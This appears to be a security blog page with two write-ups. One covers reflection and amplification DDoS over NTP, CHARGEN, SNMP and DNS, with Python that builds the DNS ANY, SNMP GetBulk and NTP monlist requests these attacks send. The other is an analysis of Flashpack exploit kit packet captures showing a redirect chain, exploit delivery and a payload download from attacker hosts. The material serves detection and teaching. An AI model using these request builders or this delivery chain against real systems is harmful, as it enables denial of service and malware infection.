Massive Distributed Reflection Denial of Service (DrDoS) DoSNETs for hire – NTP, Chargen, SNMP, SSDP, DNS

DDoS attacks in which a few thousand infected Windows PCs SYN flood a network have been taking a back seat to the next generation of denial of service attacks, known as Distributed Reflection Denial of Service (DrDoS) attacks. A packet kiddie no longer needs to compromise servers and PCs to launch one: the attacker spoofs the victim’s address as the source of small requests to third-party servers, and those servers send their much larger replies to the victim. Many administrators of the servers being used have no idea they are taking part in an attack. Reflection attacks are not new to network security; you may have heard of the original amplification attack, “smurf”. In a smurf attack large numbers of Internet Control Message Protocol (ICMP) echo requests with the intended victim’s spoofed source IP are sent to a network’s IP broadcast address, and by default most devices on that network reply to the source IP address. The attack was so devastating that several non-profit organizations began raising awareness of the issue. One in particular, netscan.org, when it began published over 122,945 misconfigured networks that would respond to spoofed ICMP echo requests; by 2005 the number was down to a few thousand, with minimal responses from each network.

Here is a snapshot of what the internet looked like in early 2000; the table below lists each broadcast address and the number of replies it returned to a single ping request:

Last rescan: Thu Feb 24 10:15:39 PST 2000

RESP      ADDR
---------------------------------------------------------------------
124273    208.158.191.0
27545     210.45.224.255
12501     193.76.71.0
10679     202.178.229.0
10483     200.255.9.0
9818      210.72.81.0
9617      207.34.70.0
8176      207.112.112.0
7222      207.112.112.255
6681      206.130.55.0
6316      206.130.55.255
6003      210.243.91.255
5358      208.192.16.255
4658      209.132.220.255
4413      206.144.34.255
4207      206.144.35.255
3146      207.34.70.255
2418      170.118.254.0
2416      170.118.254.255


And a snapshot as of today from Powertech.no, who have kept Netscan’s operation going:

Current top ten smurf amplifiers (updated every 5 minutes)
(last update: 2015-08-09 20:01:02 CET)

Network             #Dups  #Incidents  Registered at     Home AS
212.1.130.0/24         38           0  1999-02-20 09:41  AS9105
204.158.83.0/24        27           0  1999-02-20 10:09  AS3354
209.241.162.0/24       27           0  1999-02-20 08:51  AS701
159.14.24.0/24         20           0  1999-02-20 09:39  AS2914
192.220.134.0/24       19           0  1999-02-20 09:38  AS685
204.193.121.0/24       19           0  1999-02-20 08:54  AS701
198.253.187.0/24       16           0  1999-02-20 09:34  AS22
164.106.163.0/24       14           0  1999-02-20 10:11  AS7066
12.17.161.0/24         13           0  2000-11-29 19:05  not-analyzed
199.98.24.0/24         13           0  1999-02-18 11:09  AS6199


Netscan offered a script that checked how many times x.y.z.0 and x.y.z.255 replied to a single ping packet. If either number was greater than 1 the network was misconfigured and its administrator was notified; networks responding more than 10 times per ping were the ones that ended up on smurf amplifier lists. Netscan shut its doors after helping to cut the number of networks available for smurf abuse to a small fraction of what it had been. Some organizations criticized Netscan for publishing the lists (an attacker could simply copy the vulnerable networks into an amplifier list), but they will always be remembered as the ones who saved the internet.


In today’s world there is a whole new set of protocols that can be abused in reflection attacks. A 2015 snapshot of the protocols and their amplification factors:

UDP-based amplification attacks

Protocol                  Bandwidth amplification factor
NTP                       556.9
CharGen                   358.8
DNS                       up to 179
QOTD                      140.3
Quake Network Protocol    63.9
SSDP                      30.8
Kad                       16.3
SNMPv2                    6.3
Steam Protocol            5.5
NetBIOS                   3.8
BitTorrent                3.8


No organization publishes public lists of abusable hosts these days, partly because denial of service attacks are no longer taken lightly and publishing a ready-made reflector list could invite lawsuits or prosecution. Scanning projects still exist, but they report open resolvers and open NTP, SNMP and SSDP responders privately to the networks that own them rather than posting the lists.

DNS amplification attacks:

  1. Abuse of open resolvers. This type of attack takes advantage of open or misconfigured DNS servers that answer recursive queries from anyone on the internet. Whether the server is authoritative for the queried name makes no difference, because an open resolver looks the name up and answers regardless. Attackers commonly register a domain of their own and load it with large TXT records (arbitrary, unformatted text attached to a name) so that the answer to one small query is as large as possible.
  2. Reflection/amplification off authoritative servers. If a nameserver is authoritative for the queried domain, the attacker issues a DNS ANY query, which returns every record the server holds for the name, with the victim’s address spoofed as the source so the reply goes to the victim. EDNS0 (RFC 2671, now RFC 6891) makes this worse: the requester advertises the maximum UDP payload size it can accept, so an attacker advertising 4096 bytes pulls responses far larger than the classic 512-byte limit, and responses too large for an intermediate gateway to forward can also trigger ICMP storms between gateways and responders.
  3. An “A record attack” is a different kind of DNS denial of service: the attacker issues floods of A-record queries for malformed or non-existent names under a victim’s domain, forcing the victim’s servers to do work on each and answer with an error response code (RCODE, for example NXDOMAIN). Large numbers of these queries from many sources exhaust the server rather than amplify traffic towards a third party.

Simple Network Management Protocol (SNMP) DrDoS attacks

SNMP operates at layer seven (the application layer) to manage devices such as routers, switches, VoIP phones, video systems and similar equipment. It transmits data about the devices it has records for and can also be used to configure some of them. An SNMP deployment has three parts: the managed devices, the agents (software modules running on the devices that collect the information), and the management software, which does just what you would think and maintains the records for every device it manages.

SNMP uses UDP port 161 for requests to agents and UDP port 162 for the notifications (“traps”) agents send to the manager. There are three versions, v1, v2c and v3; v2c and v3 add the GetBulkRequest and InformRequest protocol data units. Since SNMP runs over UDP, which is stateless, the source IP address can be spoofed.

The DrDoS is performed after an attacker scans the internet for SNMP hosts and their community strings (very often still the default “public”). With that information the attacker sends a GetBulkRequest of around 100 bytes and the agent answers with around 400 bytes, an amplification ratio of about 1:4. Using GetBulkRequest to walk entire Management Information Bases (MIBs) pushes the ratio to around 1:7, which makes SNMP far more efficient for DrDoS attacks.


Network Time Protocol (NTP) DrDoS attacks

NTP uses UDP port 123 to synchronize clocks between a set of clients and servers. Attackers scan and build a database of NTP servers that answer requests from anyone (they should be ACL’d to prevent abuse). The attacker then issues an NTP mode 7 (private) request for “monlist”, a monitoring function built into the daemon that returns the addresses of the last clients the server has talked to (up to 600). Mode 7 requests are normally padded to a minimum size, which keeps the request and the response closer in size; attackers strip the padding and send a much smaller request. The unpadded request was measured at 60 bytes while the response came back at 2604 bytes, giving this attack a reflection multiplier of about 43:1. On the server side, run ntpd 4.2.7p26 or later, where monlist is gone, or add “disable monitor” to ntp.conf and restrict queries with noquery.


Character Generator Protocol (CHARGEN) DrDoS attacks

CHARGEN runs over both TCP and UDP. The TCP service cannot be used for amplification because TCP is connection-oriented: the three-way handshake has to complete before any data flows, so the source address cannot be spoofed. The UDP service listens on port 19 and, for every datagram it receives, answers with a random number of characters between zero and 512 (RFC 864). The attacker therefore cannot guarantee amplification on every packet, but on average the reply is much larger than the request; open source information puts the average reflection multiplier at about 17.
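An added example, not from the original post, that covers the four protocol write-ups above (DNS, SNMP, NTP and CHARGEN) in one place: it builds the request shapes the attacks rely on (a DNS ANY query with an EDNS0 buffer size, an SNMPv2c GetBulkRequest, the NTP mode 7 monlist request) and classifies inbound UDP datagrams by those shapes, which is what you would run on a server to find out whether it is being used as a reflector. The wire formats are the standard ones; the classifier's labels, the OID and community string in the sample GetBulk, and the amplification helper's rounding are assumptions of this example.

```python
import struct


# ---- DNS: the ANY + EDNS0 query that makes open resolvers answer with large messages ----
def build_dns_query(qname, qtype=255, edns_bufsize=4096, txid=0x1234):
    """Wire-format DNS query: 12-byte header, one question, optional OPT RR (RFC 6891, formerly 2671)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1 if edns_bufsize else 0)  # RD=1
    question = b"".join(bytes([len(l)]) + l.encode() for l in qname.strip(".").split(".")) + b"\x00"
    question += struct.pack("!HH", qtype, 1)                             # QCLASS IN
    # OPT RR: root name, TYPE 41, CLASS carries the requester's UDP payload size, TTL 0, RDLEN 0
    opt = (b"\x00" + struct.pack("!HHIH", 41, edns_bufsize, 0, 0)) if edns_bufsize else b""
    return header + question + opt


def parse_dns_query(data):
    """Pull QNAME, QTYPE and the advertised EDNS0 UDP buffer size out of a query."""
    _txid, flags, _qd, _an, _ns, ar = struct.unpack("!HHHHHH", data[:12])
    off, labels = 12, []
    while data[off]:
        n = data[off]
        labels.append(data[off + 1:off + 1 + n].decode())
        off += 1 + n
    off += 1
    qtype, _qclass = struct.unpack("!HH", data[off:off + 4])
    off += 4
    bufsize = None
    if ar and off + 5 <= len(data) and data[off] == 0:
        rtype, rclass = struct.unpack("!HH", data[off + 1:off + 5])
        if rtype == 41:
            bufsize = rclass
    return {"qname": ".".join(labels), "qtype": qtype, "edns_bufsize": bufsize,
            "is_response": bool(flags & 0x8000)}


# ---- NTP: mode 7 (private) request, implementation XNTPD (3), MON_GETLIST (20) / MON_GETLIST_1 (42) ----
def is_ntp_monlist(data):
    return len(data) >= 8 and (data[0] & 0x07) == 7 and data[2] == 3 and data[3] in (20, 42)


# ---- SNMP: minimal BER to reach the PDU tag (0xA5 == GetBulkRequest in SNMPv2c) ----
def _ber_len(data, off):
    first = data[off]
    if first < 0x80:
        return first, off + 1
    n = first & 0x7F
    return int.from_bytes(data[off + 1:off + 1 + n], "big"), off + 1 + n


def _ber(tag, content):
    n = len(content)
    length = bytes([n]) if n < 0x80 else b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + content


def snmp_message_info(data):
    """Version, community and PDU tag of an SNMPv1/v2c message, or None if it is not one."""
    if not data or data[0] != 0x30:
        return None
    _, off = _ber_len(data, 1)
    if data[off] != 0x02:
        return None
    n, off = _ber_len(data, off + 1)
    version = int.from_bytes(data[off:off + n], "big")
    off += n
    if data[off] != 0x04:
        return None
    n, off = _ber_len(data, off + 1)
    community = data[off:off + n].decode(errors="replace")
    off += n
    return {"version": version, "community": community, "pdu_tag": data[off]}


def build_snmp_getbulk(community=b"public", max_repetitions=2250, oid=b"\x2b\x06\x01\x02\x01"):
    """SNMPv2c GetBulkRequest for 1.3.6.1.2.1 (constructed sample; max_repetitions up to 32767)."""
    varbinds = _ber(0x30, _ber(0x30, _ber(0x06, oid) + _ber(0x05, b"")))
    pdu = _ber(0xA5, _ber(0x02, b"\x01") + _ber(0x02, b"\x00")
               + _ber(0x02, max_repetitions.to_bytes(2, "big")) + varbinds)
    return _ber(0x30, _ber(0x02, b"\x01") + _ber(0x04, community) + pdu)


def classify_udp_request(dport, payload):
    """Label an inbound UDP datagram with the reflection-request type it matches, if any."""
    if dport == 53:
        q = parse_dns_query(payload)
        if q["qtype"] == 255:
            return f"dns-any-edns{q['edns_bufsize']}" if q["edns_bufsize"] else "dns-any"
        return "dns"
    if dport == 123:
        return "ntp-monlist" if is_ntp_monlist(payload) else "ntp"
    if dport == 161:
        info = snmp_message_info(payload)
        return "snmp-getbulk" if info and info["pdu_tag"] == 0xA5 else "snmp"
    if dport == 19:
        return "chargen"          # any datagram at all draws up to 512 bytes back (RFC 864)
    return "other"


def amplification_factor(request_bytes, response_bytes):
    """Bandwidth amplification factor as used in the table above, e.g. 60-byte monlist -> 2604 bytes."""
    return round(response_bytes / request_bytes, 1)
```

On a server, feed classify_udp_request the destination port and payload of each inbound datagram and count the labels per source: a stream of dns-any-edns4096, ntp-monlist or snmp-getbulk from addresses that never complete any other exchange is a sign the host is being used as a reflector, and the source addresses are the victims, not the attacker.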

 

Here is an actual example of what a CHARGEN attack looks like in a packet. Note that this reflector answers from an ephemeral source port (61997) rather than from port 19, and the spoofed destination port is 9315, so a filter that only keys on source port 19 would miss it; the rotating printable-ASCII pattern in the payload is the reliable indicator:

2015-04-16 06:17:16.392098 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443
.>..E…26..q……”…..-$c..w
!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
“#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl

2015-04-16 06:17:16.393881 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443
.>..E…27..q……”…..-$c..w
!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
“#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl

2015-04-16 06:17:16.398694 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443
.>..E…2<..q……”…..-$c..w
!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
“#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl


In the wild there have been reports of NTP DoSNETs attacking at over 100 GB/s, SNMP DoSNETs capable of 40 GB/s, DNS attacks at 10 GB/s and CHARGEN DoSNETs at about 20 MB/s. One attacker or group able to leverage all of these at the same time would be devastating to virtually any server on the net. Currently you can buy or rent these DoSNETs on underground forums and IRC channels for as little as $5 for a 30 minute attack.


Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack Web Based Kit

Here you can see the request chain that starts at the compromised web page (arksylhet[.]com/A67iD4eo/index.html). The attackers inserted an iframe into that page that pulls in a small JavaScript redirect file from a second compromised host; the GET for js.js below carries the compromised page as its Referer.

2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E…_…….\+lF..j..P..X.X.7_\|P…D…HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: “894002-47-4ca04cfa1a5c0″
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location=’http://69.194.193.34/links/systems-links_warns.php’;   <—  The JavaScript file simply assigns document.location, which sends the browser to the landing page of the exploit kit (the 71-byte body matches the Content-Length above)

Redirection to the landing page; note that the Referer below is the same URL the JavaScript had hard-coded in it

2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://69.194.193.34/links/systems-links_warns.php
The landing page then instructs the victim’s browser to fetch “java.jar”, a Java archive containing the exploit for the vulnerable Java version the client advertises (1.7.0_06). Note that this request is made by the Java plugin, not the browser: the User-Agent changes to Java/1.7.0_06, the Accept header is the JRE’s, and there is no Referer.
2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9*a@….M..j.E..”…P.?.GA.*.P…….GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive <— MIME TYPE
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06  <— Vulnerable version of Java
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
E…`#……E..”..j..P..A.*..?.XP…;3..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:01 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 33010
Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT
Accept-Ranges: bytes

 

So at this point the victim has been redirected to the exploit kit site and an exploit has been delivered. How do we know the exploit kit did its job?

Below is the proof: the request for the malicious executable. We know it is the payload request because it is made by the exploited Java process rather than the browser, so there is still no Referer, the User-Agent is still Java/1.7.0_06, and the “accept-encoding: pack200-gzip, gzip” header the JRE sends when it fetches an archive is gone.

2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1   <—- The URL is a pointer on the exploit kit server to an executable. A payload request does not need .exe, .zip or any other extension in the GET line; it simply names a location on the server, and the kit decides what to hand back.

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06

Host: 69.194.193.34

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

 

To confirm, we look at the server’s response to the client’s request:

 

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:05 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131584
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Wed, 19 Sep 2012 02:42:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=”contacts.exe”     <—– There it is, the GET request resulted in the download of a file named “contacts.exe”
Content-Transfer-Encoding: binary

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

 

To summarize: at this point the exploit kit has successfully exploited the victim’s machine, because it made the machine download a file without the user’s consent by exploiting a vulnerability in Java that breaks out of the sandbox and onto the host. This does not mean the file ran or that malware is now present on the machine: anti-virus or another host-based prevention system could easily have blocked it, or the file may simply have failed to install. To call it an infection you need corroborating evidence, either from the host (the dropped file, new persistence entries) or from the network (post-infection check-in traffic from the same host).

 
Flashpack Web Based Exploit Kit Exploits an Internet Explorer vulnerability

In this scenario the victim is using the Google Translate service to view a website. The site, hitcric[.]info, is a legitimate site hosting live Cricket (the sport) streams that has been compromised.

 

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429
E…..@….,….Y.f”…P@HD.3.:[P….k..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: hitcric[.]info
Connection: Keep-Alive

2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519
E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily   <—- The compromised site answers with a redirect to the web-based exploit kit instead of its own content; note the “Location:” header. The s= parameter is plain base64 of a query string that tells the kit where the victim came from (it decodes to surl=hitcric.info&sport=80 plus a timestamp and a key).
Server: nginx admin
Date: Mon, 19 May 2014 02:13:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==


The victim has now hit what is known as the “landing page”.


2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605
E….’@………_..Z…P’.=.n.~cP…….GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878
E………c2_..Z…..P..n.~c’.@.P…e…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding
PASSES BROWSER INFORMATION BACK TO THE EXPLOIT KIT BELOW WITH THE POST REQUEST TO “json.php”

2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699
E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Content-Length: 207
Connection: Keep-Alive
Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d
2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0
E..(……fk_..Z…..P..n.9.’.G.P….d……..
2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584
E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
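
Both encoded values in this exchange can be decoded offline: the base64 `s=` parameter in the 302 “Location:” header above, and the hex `id=` body posted to json.php. The following is an added example (not code from the original post); the sample values are copied from the capture above, with the kit domain left defanged.

```python
"""Decode the two encoded Flashpack parameters seen in the capture above.
Added example, not the original post's code; sample values are the ones
shown in the capture, with the domain left defanged ([.])."""
import base64
from urllib.parse import parse_qs

# "Location:" header from the 302 the compromised site returned (from the capture).
REDIRECT = ("http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?"
            "s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkm"
            "c3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==")

# Body of the POST to json.php (hex-encoded browser/plugin fingerprint, from the capture).
JSON_PHP_BODY = ("id=306a617661646273696c766572666c323031346d736965387c6c6579396e62"
                 "75396334633572336f6965333831396974353239393533633138303533363266"
                 "3931613264313662366430373166643562302e6e73312e626179616e646f766d"
                 "6563692e636f6d")


def decode_redirect(url: str) -> dict:
    """Return the key/value pairs hidden in the base64 's=' query parameter.

    The query is split by hand rather than with urlsplit so a defanged
    host ("[.]") does not trip the URL parser.
    """
    query = url.split("?", 1)[1]
    blob = parse_qs(query)["s"][0]
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    inner = base64.b64decode(blob).decode("ascii")
    # Inner string is itself form-encoded: surl (compromised referrer), sport, key, ...
    return {k: v[0] for k, v in parse_qs(inner).items()}


def decode_fingerprint(body: str) -> dict:
    """Unhex the 'id=' value; the kit separates fingerprint and host with '|'."""
    form = parse_qs(body)
    text = bytes.fromhex(form["id"][0]).decode("ascii")
    fingerprint, _, host = text.partition("|")
    return {"fingerprint": fingerprint, "host": host}


if __name__ == "__main__":
    # Shows surl=hitcric.info (the hacked site) and a fingerprint naming java/silverlight/msie.
    print(decode_redirect(REDIRECT))
    print(decode_fingerprint(JSON_PHP_BODY))
```

The `surl` value ties the landing page back to the compromised referrer site, and the fingerprint lists the plugins the kit will choose exploits for; both are useful pivots when hunting for the same kit in other captures.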
The server sends the Internet Explorer exploit as an embedded font file (.eot), which is a binary file format; note the large Content-Length.

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285
E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive
2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268
E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:48 GMT
Content-Type: application/octet-stream   <—- MIME type for a binary file
Content-Length: 22319


The first exploit appears to have failed; here is a second attempt with a different exploit for Internet Explorer:
2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156
E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0
E..(.+….f(_..Z…..P..g^.dcS&.P…O5……..
2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268
E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:52 GMT
Content-Type: application/octet-stream
Content-Length: 13312
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-3400″
Accept-Ranges: bytes

